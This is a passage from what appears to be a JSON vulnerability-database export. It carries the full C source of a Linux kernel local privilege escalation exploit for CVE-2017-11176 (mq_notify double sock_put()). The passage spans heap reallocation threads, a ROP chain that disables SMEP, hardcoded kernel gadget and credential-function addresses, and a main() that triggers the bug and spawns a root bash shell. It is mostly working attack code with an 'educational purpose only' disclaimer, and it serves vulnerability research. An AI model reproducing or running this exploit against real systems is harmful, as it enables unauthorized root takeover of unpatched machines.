printf(\"[ ] creating unblock thread...\\n\");\r\n if ((errno = pthread_create(&tid, NULL, unblock_thread, &uta)) != 0)\r\n {\r\n perror(\"[-] pthread_create\");\r\n goto fail;\r\n }\r\n while (uta.is_ready == false) // spinlock until thread is created\r\n ;\r\n printf(\"[+] unblocking thread has been created!\\n\");\r\n\r\n printf(\"[ ] get ready to block\\n\");\r\n if ((_mq_notify((mqd_t)-1, &sigev) != -1) || (errno != EBADF))\r\n {\r\n perror(\"[-] mq_notify\");\r\n goto fail;\r\n }\r\n printf(\"[+] mq_notify succeed\\n\");\r\n\r\n return 0;\r\n\r\nfail:\r\n return -1;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic int fill_receive_buffer(struct sock_pid *target, struct sock_pid *guard)\r\n{\r\n char buf[1024*10];\r\n int new_size = 0; // this will be reset to SOCK_MIN_RCVBUF\r\n\r\n struct sockaddr_nl addr = {\r\n .nl_family = AF_NETLINK,\r\n .nl_pad = 0,\r\n .nl_pid = target->pid, // use the target's pid\r\n .nl_groups = 0 // no groups\r\n };\r\n\r\n struct iovec iov = {\r\n .iov_base = buf,\r\n .iov_len = sizeof(buf)\r\n };\r\n\r\n struct msghdr mhdr = {\r\n .msg_name = &addr,\r\n .msg_namelen = sizeof(addr),\r\n .msg_iov = &iov,\r\n .msg_iovlen = 1,\r\n .msg_control = NULL,\r\n .msg_controllen = 0,\r\n .msg_flags = 0, \r\n };\r\n\r\n printf(\"[ ] preparing blocking netlink socket\\n\");\r\n\r\n if (_setsockopt(target->sock_fd, SOL_SOCKET, SO_RCVBUF, &new_size, sizeof(new_size)))\r\n perror(\"[-] setsockopt\"); // no worry if it fails, it is just an optim.\r\n else\r\n printf(\"[+] receive buffer reduced\\n\");\r\n\r\n printf(\"[ ] flooding socket\\n\");\r\n while (_sendmsg(guard->sock_fd, &mhdr, MSG_DONTWAIT) > 0)\r\n ;\r\n if (errno != EAGAIN)\r\n {\r\n perror(\"[-] sendmsg\");\r\n goto fail;\r\n }\r\n printf(\"[+] flood completed\\n\");\r\n\r\n printf(\"[+] blocking socket ready\\n\");\r\n\r\n return 0;\r\n\r\nfail:\r\n printf(\"[-] failed to prepare blocking socket\\n\");\r\n return -1;\r\n}\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\n// ROP-chains\r\n#define STORE_EAX(addr) \\\r\n *stack++ = POP_RDI_ADDR; \\\r\n *stack++ = (uint64_t)addr + 4; \\\r\n *stack++ = MOV_PTR_RDI_MIN4_EAX_ADDR;\r\n \r\n#define SAVE_ESP(addr) \\\r\n STORE_EAX(addr);\r\n\r\n#define SAVE_RBP(addr_lo, addr_hi) \\\r\n *stack++ = MOV_RAX_RBP_ADDR; \\\r\n STORE_EAX(addr_lo); \\\r\n *stack++ = SHR_RAX_16_ADDR; \\\r\n *stack++ = SHR_RAX_16_ADDR; \\\r\n STORE_EAX(addr_hi);\r\n\r\n#define CR4_TO_RAX() \\\r\n *stack++ = POP_RBP_ADDR; \\\r\n *stack = (unsigned long) stack + 2*8; stack++; /* skip 0xdeadbeef */ \\\r\n *stack++ = MOV_RAX_CR4_LEAVE_ADDR; \\\r\n *stack++ = 0xdeadbeef; // dummy RBP value!\r\n\r\n#define RDI_TO_CR4() \\\r\n *stack++ = POP_RBP_ADDR; \\\r\n *stack = (unsigned long) stack + 2*8; stack++; /* skip 0xdeadbeef */ \\\r\n *stack++ = MOV_CR4_RDI_LEAVE_ADDR; \\\r\n *stack++ = 0xdeadbeef; // dummy RBP value!\r\n\r\n#define SMEP_MASK (~((uint64_t)(1 << 20))) // 0xffffffffffefffff\r\n\r\n#define DISABLE_SMEP() \\\r\n CR4_TO_RAX(); \\\r\n *stack++ = POP_RDI_ADDR; \\\r\n *stack++ = SMEP_MASK; \\\r\n *stack++ = MOV_EDX_EDI_ADDR; \\\r\n *stack++ = AND_RAX_RDX_ADDR; \\\r\n *stack++ = MOV_EDI_EAX_ADDR; \\\r\n RDI_TO_CR4();\r\n\r\n#define JUMP_TO(addr) \\\r\n *stack++ = POP_RCX_ADDR; \\\r\n *stack++ = (uint64_t) addr; \\\r\n *stack++ = JMP_RCX_ADDR;\r\n \r\n// ----------------------------------------------------------------------------\r\n\r\nextern void userland_entry(void); // make GCC happy\r\n\r\nstatic __attribute__((unused)) void wrapper(void) \r\n{\r\n // avoid the prologue\r\n __asm__ volatile( \"userland_entry:\" :: );\r\n\r\n // reconstruct original rbp/rsp\r\n restored_rbp = ((saved_rbp_hi << 32) | saved_rbp_lo);\r\n restored_rsp = ((saved_rbp_hi << 32) | saved_esp);\r\n \r\n __asm__ volatile( \"movq %0, %%rax\\n\"\r\n \"movq %%rax, %%rbp\\n\"\r\n :: \"m\"(restored_rbp) );\r\n\r\n __asm__ volatile( \"movq %0, %%rax\\n\" \r\n \"movq %%rax, %%rsp\\n\"\r\n :: \"m\"(restored_rsp) );\r\n\r\n uint64_t ptr = (uint64_t) &payload;\r\n __asm__ volatile( \"movq %0, %%rax\\n\"\r\n \"call *%%rax\\n\"\r\n :: \"m\"(ptr) );\r\n\r\n // arbitrary call primitive requires a non-null return value (i.e. non zero RAX register)\r\n __asm__ volatile( \"movq $5555, %%rax\\n\"\r\n :: );\r\n\r\n // avoid the epilogue and the \"leave\" instruction\r\n __asm__ volatile( \"ret\" :: );\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic void build_rop_chain(uint64_t *stack)\r\n{\r\n memset((void*)stack, 0xaa, 4096);\r\n\r\n SAVE_ESP(&saved_esp);\r\n SAVE_RBP(&saved_rbp_lo, &saved_rbp_hi);\r\n DISABLE_SMEP();\r\n JUMP_TO(&userland_entry);\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic int allocate_uland_structs(void)\r\n{\r\n // arbitrary value, must not collide with already mapped memory (/proc/<PID>/maps)\r\n void *starting_addr = (void*) 0x20000000;\r\n size_t max_try = 10;\r\n\r\nretry:\r\n if (max_try-- <= 0)\r\n {\r\n printf(\"[-] failed to allocate structures at fixed location\\n\");\r\n return -1;\r\n }\r\n\r\n starting_addr += 4096;\r\n\r\n g_fake_stack = (char*) _mmap(starting_addr, 4096, PROT_READ|PROT_WRITE,\r\n MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);\r\n if (g_fake_stack == MAP_FAILED)\r\n {\r\n perror(\"[-] mmap\");\r\n goto retry;\r\n }\r\n\r\n g_uland_wq_elt = (struct wait_queue*) _mmap(g_fake_stack + 0x100000000, 4096, PROT_READ|PROT_WRITE,\r\n MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);\r\n if (g_uland_wq_elt == MAP_FAILED)\r\n {\r\n perror(\"[-] mmap\");\r\n munmap((void*)g_fake_stack, 4096);\r\n goto retry;\r\n }\r\n\r\n // paranoid check\r\n if ((char*)g_uland_wq_elt != ((char*)g_fake_stack + 0x100000000))\r\n {\r\n munmap((void*)g_fake_stack, 4096);\r\n munmap((void*)g_uland_wq_elt, 4096);\r\n goto retry;\r\n }\r\n\r\n printf(\"[+] userland structures allocated:\\n\");\r\n printf(\"[+] g_uland_wq_elt = %p\\n\", g_uland_wq_elt);\r\n printf(\"[+] g_fake_stack = %p\\n\", g_fake_stack);\r\n\r\n return 0;\r\n}\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\nstatic bool can_use_realloc_gadget(void)\r\n{\r\n int fd;\r\n int ret;\r\n bool usable = false;\r\n char buf[32];\r\n\r\n if ((fd = _open(\"/proc/sys/net/core/optmem_max\", O_RDONLY)) < 0)\r\n {\r\n perror(\"[-] open\");\r\n // TODO: fallback to sysctl syscall\r\n return false; // we can't conclude, try it anyway or not ?\r\n }\r\n\r\n memset(buf, 0, sizeof(buf));\r\n if ((ret = _read(fd, buf, sizeof(buf))) <= 0)\r\n {\r\n perror(\"[-] read\");\r\n goto out;\r\n }\r\n printf(\"[ ] optmem_max = %s\", buf);\r\n\r\n if (atol(buf) > 512) // only test if we can use the kmalloc-1024 cache\r\n usable = true;\r\n\r\nout:\r\n _close(fd);\r\n return usable;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic int init_realloc_data(void)\r\n{\r\n struct cmsghdr *first;\r\n int* pid = (int*)&g_realloc_data[NLK_PID_OFFSET];\r\n void** groups = (void**)&g_realloc_data[NLK_GROUPS_OFFSET];\r\n struct wait_queue_head *nlk_wait = (struct wait_queue_head*) &g_realloc_data[NLK_WAIT_OFFSET];\r\n\r\n memset((void*)g_realloc_data, 'A', sizeof(g_realloc_data));\r\n\r\n // necessary to pass checks in __scm_send()\r\n first = (struct cmsghdr*) &g_realloc_data;\r\n first->cmsg_len = sizeof(g_realloc_data);\r\n first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to \"skip\" cmsg\r\n first->cmsg_type = 1; // <---- ARBITRARY VALUE\r\n\r\n // used by reallocation checker\r\n *pid = MAGIC_NL_PID;\r\n *groups = MAGIC_NL_GROUPS;\r\n\r\n // the first element in nlk's wait queue is our userland element (task_list field!)\r\n BUILD_BUG_ON(offsetof(struct wait_queue_head, task_list) != WQ_HEAD_TASK_LIST_OFFSET);\r\n nlk_wait->slock = 0;\r\n nlk_wait->task_list.next = (struct list_head*)&g_uland_wq_elt->task_list;\r\n nlk_wait->task_list.prev = (struct list_head*)&g_uland_wq_elt->task_list;\r\n\r\n // initialise the \"fake\" second element (because of list_for_each_entry_safe())\r\n g_fake_next_elt.next = (struct list_head*)&g_fake_next_elt; // point to itself\r\n g_fake_next_elt.prev = (struct list_head*)&g_fake_next_elt; // point to itself\r\n\r\n // initialise the userland wait queue element\r\n BUILD_BUG_ON(offsetof(struct wait_queue, func) != WQ_ELMT_FUNC_OFFSET);\r\n BUILD_BUG_ON(offsetof(struct wait_queue, task_list) != WQ_ELMT_TASK_LIST_OFFSET);\r\n g_uland_wq_elt->flags = WQ_FLAG_EXCLUSIVE; // set to exit after the first arbitrary call\r\n g_uland_wq_elt->private = NULL; // unused\r\n g_uland_wq_elt->func = (wait_queue_func_t) XCHG_EAX_ESP_ADDR; // <----- arbitrary call! \r\n g_uland_wq_elt->task_list.next = (struct list_head*)&g_fake_next_elt;\r\n g_uland_wq_elt->task_list.prev = (struct list_head*)&g_fake_next_elt;\r\n printf(\"[+] g_uland_wq_elt.func = %p\\n\", g_uland_wq_elt->func);\r\n\r\n return 0;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic bool check_realloc_succeed(int sock_fd, int magic_pid, unsigned long magic_groups)\r\n{\r\n struct sockaddr_nl addr;\r\n size_t addr_len = sizeof(addr);\r\n\r\n memset(&addr, 0, sizeof(addr));\r\n // this will invoke \"netlink_getname()\" (uncontrolled read)\r\n if (_getsockname(sock_fd, &addr, &addr_len))\r\n {\r\n perror(\"[-] getsockname\");\r\n goto fail;\r\n }\r\n printf(\"[ ] addr_len = %lu\\n\", addr_len);\r\n printf(\"[ ] addr.nl_pid = %d\\n\", addr.nl_pid);\r\n printf(\"[ ] magic_pid = %d\\n\", magic_pid);\r\n\r\n if (addr.nl_pid != magic_pid)\r\n {\r\n printf(\"[-] magic PID does not match!\\n\");\r\n goto fail;\r\n }\r\n\r\n if (addr.nl_groups != magic_groups) \r\n {\r\n printf(\"[-] groups pointer does not match!\\n\");\r\n goto fail;\r\n }\r\n\r\n return true;\r\n \r\nfail:\r\n printf(\"[-] failed to check realloc success status!\\n\");\r\n return false;\r\n}\r\n\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic int init_unix_sockets(struct realloc_thread_arg * rta)\r\n{\r\n struct timeval tv;\r\n static int sock_counter = 0;\r\n\r\n if (((rta->recv_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) ||\r\n ((rta->send_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0))\r\n {\r\n perror(\"[-] socket\");\r\n goto fail;\r\n }\r\n\r\n // bind an \"abstract\" socket (first byte is NULL)\r\n memset(&rta->addr, 0, sizeof(rta->addr));\r\n rta->addr.sun_family = AF_UNIX;\r\n sprintf(rta->addr.sun_path + 1, \"sock_%lx_%d\", _gettid(), ++sock_counter);\r\n if (_bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))\r\n {\r\n perror(\"[-] bind\");\r\n goto fail;\r\n }\r\n\r\n if (_connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))\r\n {\r\n perror(\"[-] connect\");\r\n goto fail;\r\n }\r\n\r\n // set the timeout value to MAX_SCHEDULE_TIMEOUT\r\n memset(&tv, 0, sizeof(tv));\r\n if (_setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv)))\r\n {\r\n perror(\"[-] setsockopt\");\r\n goto fail;\r\n }\r\n\r\n return 0;\r\n\r\nfail:\r\n // TODO: release everything\r\n printf(\"[-] failed to initialize UNIX sockets!\\n\");\r\n return -1;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic void* realloc_thread(void *arg)\r\n{\r\n struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg;\r\n struct msghdr mhdr;\r\n char buf[200];\r\n\r\n // initialize msghdr\r\n struct iovec iov = {\r\n .iov_base = buf,\r\n .iov_len = sizeof(buf),\r\n };\r\n memset(&mhdr, 0, sizeof(mhdr));\r\n mhdr.msg_iov = &iov;\r\n mhdr.msg_iovlen = 1;\r\n\r\n // the thread should inherit main thread cpumask, better be sure and redo-it!\r\n if (migrate_to_cpu0())\r\n goto fail;\r\n\r\n // make it block\r\n while (_sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0)\r\n ;\r\n if (errno != EAGAIN)\r\n { \r\n perror(\"[-] sendmsg\");\r\n goto fail;\r\n }\r\n\r\n // use the arbitrary data now\r\n iov.iov_len = 16; // don't need to allocate lots of memory now\r\n mhdr.msg_control = (void*)g_realloc_data; // use the ancillary data buffer\r\n mhdr.msg_controllen = sizeof(g_realloc_data);\r\n\r\n g_nb_realloc_thread_ready++;\r\n\r\n while (!g_realloc_now) // spinlock until the big GO!\r\n ;\r\n\r\n // the next call should block while \"reallocating\"\r\n if (_sendmsg(rta->send_fd, &mhdr, 0) < 0)\r\n {\r\n perror(\"[-] sendmsg\");\r\n goto fail;\r\n }\r\n\r\n return NULL;\r\n\r\nfail:\r\n printf(\"[-] REALLOC THREAD FAILURE!!!\\n\");\r\n return NULL;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs)\r\n{\r\n int thread = 0;\r\n int ret = -1;\r\n\r\n if (!can_use_realloc_gadget())\r\n {\r\n printf(\"[-] can't use the 'ancillary data buffer' reallocation gadget!\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] can use the 'ancillary data buffer' reallocation gadget!\\n\");\r\n\r\n if (init_realloc_data())\r\n {\r\n printf(\"[-] failed to initialize reallocation data!\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] reallocation data initialized!\\n\");\r\n\r\n printf(\"[ ] initializing reallocation threads, please wait...\\n\");\r\n for (thread = 0; thread < nb_reallocs; ++thread)\r\n {\r\n if (init_unix_sockets(&rta[thread]))\r\n {\r\n printf(\"[-] failed to init UNIX sockets!\\n\");\r\n goto fail;\r\n }\r\n\r\n if ((ret = pthread_create(&rta[thread].tid, NULL, realloc_thread, &rta[thread])) != 0)\r\n {\r\n perror(\"[-] pthread_create\");\r\n goto fail;\r\n }\r\n }\r\n\r\n // wait until all threads have been created\r\n while (g_nb_realloc_thread_ready < nb_reallocs)\r\n _sched_yield(); // don't run me, run the reallocator threads!\r\n\r\n printf(\"[+] %lu reallocation threads ready!\\n\", nb_reallocs);\r\n\r\n return 0;\r\n\r\nfail:\r\n printf(\"[-] failed to initialize reallocation\\n\");\r\n return -1;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\n// keep this inlined, we can't loose any time (critical path)\r\nstatic inline __attribute__((always_inline)) void realloc_NOW(void)\r\n{\r\n g_realloc_now = 1;\r\n _sched_yield(); // don't run me, run the reallocator threads!\r\n sleep(5);\r\n}\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\nint main(void)\r\n{\r\n int sock_fd2 = -1;\r\n int val;\r\n struct realloc_thread_arg rta[NB_REALLOC_THREADS];\r\n\r\n printf(\"[ ] -={ CVE-2017-11176 Exploit }=-\\n\");\r\n\r\n if (migrate_to_cpu0())\r\n {\r\n printf(\"[-] failed to migrate to CPU#0\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] successfully migrated to CPU#0\\n\");\r\n\r\n if (allocate_uland_structs())\r\n {\r\n printf(\"[-] failed to allocate userland structures!\\n\");\r\n goto fail;\r\n }\r\n\r\n build_rop_chain((uint64_t*)g_fake_stack);\r\n printf(\"[+] ROP-chain ready\\n\");\r\n\r\n memset(rta, 0, sizeof(rta));\r\n if (init_reallocation(rta, NB_REALLOC_THREADS))\r\n {\r\n printf(\"[-] failed to initialize reallocation!\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] reallocation ready!\\n\");\r\n\r\n if (find_netlink_candidates(&g_target, &g_guard))\r\n {\r\n printf(\"[-] failed to find netlink candidates\\n\");\r\n goto fail;\r\n }\r\n printf(\"[+] netlink candidates ready:\\n\");\r\n printf(\"[+] target.pid = %d\\n\", g_target.pid);\r\n printf(\"[+] guard.pid = %d\\n\", g_guard.pid);\r\n\r\n if (fill_receive_buffer(&g_target, &g_guard))\r\n goto fail;\r\n\r\n if (((unblock_fd = _dup(g_target.sock_fd)) < 0) ||\r\n ((sock_fd2 = _dup(g_target.sock_fd)) < 0))\r\n {\r\n perror(\"[-] dup\");\r\n goto fail;\r\n }\r\n printf(\"[+] netlink fd duplicated (unblock_fd=%d, sock_fd2=%d)\\n\", unblock_fd, sock_fd2);\r\n\r\n // trigger the bug twice AND immediatly realloc!\r\n if (decrease_sock_refcounter(g_target.sock_fd, unblock_fd) ||\r\n decrease_sock_refcounter(sock_fd2, unblock_fd))\r\n {\r\n goto fail;\r\n }\r\n realloc_NOW();\r\n\r\n // close it before invoking the arbitrary call\r\n close(g_guard.sock_fd);\r\n printf(\"[+] guard socket closed\\n\");\r\n\r\n if (!check_realloc_succeed(unblock_fd, MAGIC_NL_PID, MAGIC_NL_GROUPS))\r\n {\r\n printf(\"[-] reallocation failed!\\n\");\r\n // TODO: retry the exploit\r\n goto fail;\r\n }\r\n printf(\"[+] reallocation succeed! Have fun :-)\\n\");\r\n\r\n\r\n // trigger the arbitrary call primitive\r\n printf(\"[ ] invoking arbitrary call primitive...\\n\");\r\n val = 3535; // need to be different than zero\r\n if (_setsockopt(unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &val, sizeof(val)))\r\n {\r\n perror(\"[-] setsockopt\");\r\n goto fail;\r\n }\r\n printf(\"[+] arbitrary call succeed!\\n\");\r\n\r\n printf(\"[+] exploit complete!\\n\");\r\n\r\n printf(\"[ ] popping shell now!\\n\");\r\n char* shell = \"/bin/bash\";\r\n char* args[] = {shell, \"-i\", NULL};\r\n execve(shell, args, NULL);\r\n\r\n return 0;\r\n\r\nfail:\r\n printf(\"[-] exploit failed!\\n\");\r\n PRESS_KEY();\r\n return -1;\r\n}\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45553/"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:12", "description": "\nLinux Kernel 4.11.8 - mq_notify: double sock_put() Local Privilege Escalation", "edition": 1, "published": "2018-10-02T00:00:00", "title": "Linux Kernel 4.11.8 - mq_notify: double sock_put() Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11176"], "modified": "2018-10-02T00:00:00", "id": "EXPLOITPACK:4F74638D00AC37320CD01F8B963CC200", "href": "", "sourceData": "/*\n * CVE-2017-11176: \"mq_notify: double sock_put()\" by LEXFO (2018).\n *\n * DISCLAIMER: The following code is for EDUCATIONAL purpose only. Do not\n * use it on a system without authorizations.\n *\n * WARNING: The exploit WILL NOT work on your target, it requires modifications!\n *\n * Compile with:\n *\n * gcc -fpic -O0 -std=c99 -Wall -pthread cve-2017-11176.c -o exploit\n *\n * For a complete explanation / analysis, please read the following series:\n *\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part2.html\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html\n */\n\n#define _GNU_SOURCE\n#include <asm/types.h>\n#include <mqueue.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/un.h>\n#include <linux/netlink.h>\n#include <pthread.h>\n#include <errno.h>\n#include <stdbool.h>\n#include <sched.h>\n#include <stddef.h>\n#include <sys/mman.h>\n#include <stdint.h>\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\n#define NOTIFY_COOKIE_LEN (32)\n#define SOL_NETLINK (270) // from [include/linux/socket.h]\n\n#define NB_REALLOC_THREADS 200\n#define KMALLOC_TARGET 1024\n\n#define MAX_SOCK_PID_SPRAY 300\n\n#define MAGIC_NL_PID 0x11a5dcee\n#define MAGIC_NL_GROUPS 0x0\n\n// ----------------------------------------------------------------------------\n\n// avoid library wrappers\n#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)\n#define _mmap(addr, length, prot, flags, fd, offset) syscall(__NR_mmap, addr, length, prot, flags, fd, offset)\n#define _munmap(addr, length) syscall(_NR_munmap, addr, length)\n#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)\n#define _setsockopt(sockfd, level, optname, optval, optlen) \\\n syscall(__NR_setsockopt, sockfd, level, optname, optval, optlen)\n#define _getsockopt(sockfd, level, optname, optval, optlen) \\\n syscall(__NR_getsockopt, sockfd, level, optname, optval, optlen)\n#define _dup(oldfd) syscall(__NR_dup, oldfd)\n#define _close(fd) syscall(__NR_close, fd)\n#define _sendmsg(sockfd, msg, flags) syscall(__NR_sendmsg, sockfd, msg, flags)\n#define _bind(sockfd, addr, addrlen) syscall(__NR_bind, sockfd, addr, addrlen)\n#define _getpid() syscall(__NR_getpid)\n#define _gettid() syscall(__NR_gettid)\n#define _sched_setaffinity(pid, cpusetsize, mask) \\\n syscall(__NR_sched_setaffinity, pid, cpusetsize, mask)\n#define _open(pathname, flags) syscall(__NR_open, pathname, flags)\n#define _read(fd, buf, count) syscall(__NR_read, fd, buf, count)\n#define _getsockname(sockfd, addr, addrlen) syscall(__NR_getsockname, sockfd, addr, addrlen)\n#define _connect(sockfd, addr, addrlen) syscall(__NR_connect, sockfd, addr, addrlen)\n#define _sched_yield() syscall(__NR_sched_yield)\n#define _lseek(fd, offset, whence) syscall(__NR_lseek, fd, offset, whence)\n\n// ----------------------------------------------------------------------------\n\n#define PRESS_KEY() \\\n do { printf(\"[ ] press key to continue...\\n\"); getchar(); } while(0)\n\n#define BUILD_BUG_ON(cond) ((void)sizeof(char[1 - 2 * !!(cond)]))\n\n// ----------------------------------------------------------------------------\n\n// target specific offset\n#define NLK_PID_OFFSET 0x288\n#define NLK_GROUPS_OFFSET 0x2a0\n#define NLK_WAIT_OFFSET 0x2b0\n#define WQ_HEAD_TASK_LIST_OFFSET 0x8\n#define WQ_ELMT_FUNC_OFFSET 0x10\n#define WQ_ELMT_TASK_LIST_OFFSET 0x18\n#define TASK_STRUCT_FILES_OFFSET 0x770\n#define FILES_STRUCT_FDT_OFFSET 0x8\n#define FDT_FD_OFFSET 0x8\n#define FILE_STRUCT_PRIVATE_DATA_OFFSET 0xa8\n#define SOCKET_SK_OFFSET 0x38\n\n// kernel function symbols\n#define NL_PID_HASHFN ((void*) 0xffffffff814b6da0)\n#define NETLINK_TABLE_GRAB ((void*) 0xffffffff814b7ea0)\n#define NETLINK_TABLE_UNGRAB ((void*) 0xffffffff814b73e0)\n#define COMMIT_CREDS ((void*) 0xffffffff810b8ee0)\n#define PREPARE_KERNEL_CRED ((void*) 0xffffffff810b90c0)\n#define NL_TABLE_ADDR ((void*) 0xffffffff824528c0)\n\n// gadgets in [_text; _etext]\n#define XCHG_EAX_ESP_ADDR ((uint64_t) 0xffffffff8107b6b8)\n#define MOV_PTR_RDI_MIN4_EAX_ADDR ((uint64_t) 0xffffffff811513b3)\n#define POP_RDI_ADDR ((uint64_t) 0xffffffff8103b81d)\n#define MOV_RAX_RBP_ADDR ((uint64_t) 0xffffffff813606d4)\n#define SHR_RAX_16_ADDR ((uint64_t) 0xffffffff810621ff)\n#define POP_RBP_ADDR ((uint64_t) 0xffffffff811b97bf)\n#define MOV_RAX_CR4_LEAVE_ADDR ((uint64_t) 0xffffffff81003009)\n#define MOV_CR4_RDI_LEAVE_ADDR ((uint64_t) 0xffffffff8100328d)\n#define AND_RAX_RDX_ADDR ((uint64_t) 0xffffffff8130c249)\n#define MOV_EDI_EAX_ADDR ((uint64_t) 0xffffffff814f118b)\n#define MOV_EDX_EDI_ADDR ((uint64_t) 0xffffffff8139ca54)\n#define POP_RCX_ADDR ((uint64_t) 0xffffffff81004abc)\n#define JMP_RCX_ADDR ((uint64_t) 0xffffffff8103357c)\n\n#define THREAD_SIZE (4096 << 2)\n\n// ----------------------------------------------------------------------------\n\nstruct realloc_thread_arg\n{\n pthread_t tid;\n int recv_fd;\n int send_fd;\n struct sockaddr_un addr;\n};\n\nstruct unblock_thread_arg\n{\n int sock_fd;\n int unblock_fd;\n bool is_ready; // we can use pthread barrier instead\n};\n\nstruct sock_pid\n{\n int sock_fd;\n uint32_t pid;\n};\n\n// ----------------------------------------------------------------------------\n\nstruct hlist_node {\n struct hlist_node *next, **pprev;\n};\n\nstruct hlist_head {\n struct hlist_node *first;\n};\n\nstruct nl_pid_hash {\n struct hlist_head* table;\n uint64_t rehash_time;\n uint32_t mask;\n uint32_t shift;\n uint32_t entries;\n uint32_t max_shift;\n uint32_t rnd;\n};\n\nstruct netlink_table {\n struct nl_pid_hash hash;\n void* mc_list;\n void* listeners;\n uint32_t nl_nonroot;\n uint32_t groups;\n void* cb_mutex;\n void* module;\n uint32_t registered;\n};\n\nstruct list_head\n{\n struct list_head *next, *prev;\n};\n\nstruct wait_queue_head\n{\n int slock;\n struct list_head task_list;\n};\n\ntypedef int (*wait_queue_func_t)(void *wait, unsigned mode, int flags, void *key);\n\nstruct wait_queue\n{\n unsigned int flags;\n#define WQ_FLAG_EXCLUSIVE 0x01\n void *private;\n wait_queue_func_t func;\n struct list_head task_list;\n};\n\nstruct socket {\n char pad[SOCKET_SK_OFFSET];\n void *sk;\n};\n\nstruct file {\n char pad[FILE_STRUCT_PRIVATE_DATA_OFFSET];\n void *private_data;\n};\n\nstruct fdtable {\n char pad[FDT_FD_OFFSET];\n struct file **fd;\n};\n\nstruct files_struct {\n char pad[FILES_STRUCT_FDT_OFFSET];\n struct fdtable *fdt;\n};\n\nstruct task_struct {\n char pad[TASK_STRUCT_FILES_OFFSET];\n struct files_struct *files;\n};\n\nstruct thread_info {\n\tstruct task_struct\t*task;\n char pad[0];\n};\n\n// ----------------------------------------------------------------------------\n\ntypedef void (*netlink_table_grab_func)(void);\ntypedef void (*netlink_table_ungrab_func)(void);\ntypedef struct hlist_head* (*nl_pid_hashfn_func)(struct nl_pid_hash *hash, uint32_t pid);\ntypedef int (*commit_creds_func)(void *new);\ntypedef void* (*prepare_kernel_cred_func)(void *daemon);\n\n#define netlink_table_grab() \\\n (((netlink_table_grab_func)(NETLINK_TABLE_GRAB))())\n#define netlink_table_ungrab() \\\n (((netlink_table_ungrab_func)(NETLINK_TABLE_UNGRAB))())\n#define nl_pid_hashfn(hash, pid) \\\n (((nl_pid_hashfn_func)(NL_PID_HASHFN))(hash, pid))\n#define commit_creds(cred) \\\n (((commit_creds_func)(COMMIT_CREDS))(cred))\n#define prepare_kernel_cred(daemon) \\\n (((prepare_kernel_cred_func)(PREPARE_KERNEL_CRED))(daemon))\n\n// ----------------------------------------------------------------------------\n\nstatic volatile size_t g_nb_realloc_thread_ready = 0;\nstatic volatile size_t g_realloc_now = 0;\nstatic volatile char g_realloc_data[KMALLOC_TARGET];\n\nstatic volatile struct list_head g_fake_next_elt;\nstatic volatile struct wait_queue *g_uland_wq_elt;\nstatic volatile char *g_fake_stack;\n\nstatic volatile uint64_t saved_esp;\nstatic volatile uint64_t saved_rbp_lo;\nstatic volatile uint64_t saved_rbp_hi;\nstatic volatile uint64_t restored_rbp;\nstatic volatile uint64_t restored_rsp;\n\nstatic struct sock_pid g_target;\nstatic struct sock_pid g_guard;\nstatic int unblock_fd = 1;\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\n#define get_thread_info(thread_stack_ptr) \\\n ((struct thread_info*) (thread_stack_ptr & ~(THREAD_SIZE - 1)))\n\n#define get_current(thread_stack_ptr) \\\n ((struct task_struct*) (get_thread_info(thread_stack_ptr)->task))\n\nstatic void payload(void)\n{\n struct task_struct *current = get_current(restored_rsp);\n struct socket *sock = 